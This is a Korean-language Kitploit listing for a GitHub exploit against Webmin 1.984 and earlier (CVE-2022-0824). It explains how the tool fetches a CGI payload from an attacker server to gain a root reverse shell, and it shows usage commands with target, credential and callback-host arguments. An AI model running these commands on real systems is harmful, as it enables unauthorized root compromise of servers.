Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Webmin-CVE-2022-0824-revshell — Webmin <=1.984용 인증 후 리버스 쉘 익스플로잇으로, CVE-2022-0824 파일 관리자 권한 상승을 이용합니다. CGI 페이로드를 다운로드 및 실행하여 루트 액세스 권한을 획득합니다. | Kitploit
도구/GitHubGitHub/faisalfs10x/webmin-cve-2022-0824-revshell
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubfaisalfs10x/webmin-cve-2022-0824-revshell

Webmin-CVE-2022-0824-revshell

Webmin <=1.984용 인증 후 리버스 쉘 익스플로잇으로, CVE-2022-0824 파일 관리자 권한 상승을 이용합니다. CGI 페이로드를 다운로드 및 실행하여 루트 액세스 권한을 획득합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1113324년 전Kitploit 검토 완료

Webmin-CVE-2022-0824-revshell

취약점 설명

Webmin 1.984 이하 - File Manager 권한 상승 익스플로잇 (CVE-2022-0824 및 CVE-2022-0829)
File Manager 모듈 제한이 설정되지 않은 낮은 권한의 Webmin 사용자는 기본 Authentic 테마를 사용하는 경우 루트 권한으로 파일에 접근할 수 있습니다. 추가로 신뢰할 수 없는 Webmin 사용자가 있는 모든 시스템은 즉시 업그레이드해야 합니다. Virtualmin 시스템은 도메인 소유자 Webmin 사용자가 구성되는 방식으로 인해 이 버그의 영향을 받지 않습니다.
출처: https://www.webmin.com/security.html

익스플로잇 설명

이 익스플로잇은 File Manager의 인증 후 부적절한 접근 제어 취약점을 이용합니다. 이 익스플로잇은 권한이 낮은 인증된 공격자에 의해 수행될 수 있습니다. 공격자가 제어하는 서버에서 원격으로 .cgi 파일을 다운로드하고 권한을 모든 사용자가 실행 가능한 파일로 변경합니다. 그 후 .cgi 파일을 실행하여 루트 권한으로 공격자 제어 서버로의 역방향 연결을 설정합니다.

참고: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

사용법

root@kitploit:~
$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444

$~  python3 Webmin-revshell.py -h                                                                                                                                    
    usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]

    Webmin CVE-2022-0824 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -t TARGET, --target TARGET
                            Target full URL, https://www.webmin.local:10000
      -c CREDENTIAL, --credential CREDENTIAL
                            Format, user:user123
      -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
                            Http server for serving payload, ex 192.168.5.120:8080
      -L CALLBACK_IP, --callback_ip CALLBACK_IP
                            Callback IP to receive revshell
      -P CALLBACK_PORT, --callback_port CALLBACK_PORT
                            Callback port to receive revshell
      -V, --version         show program's version number and exit

PoC

root@kitploit:~
대상 호스트: https://192.168.5.118:10000
공격자 호스트: 192.168.5.120

https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4

테스트 환경

root@kitploit:~
- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3

면책 조항:

root@kitploit:~
이 스크립트는 보안 분석 및 연구 목적으로만 제공되며, 불법적인 활동에 사용될 경우 저는 책임을 지지 않습니다.
도구 다운로드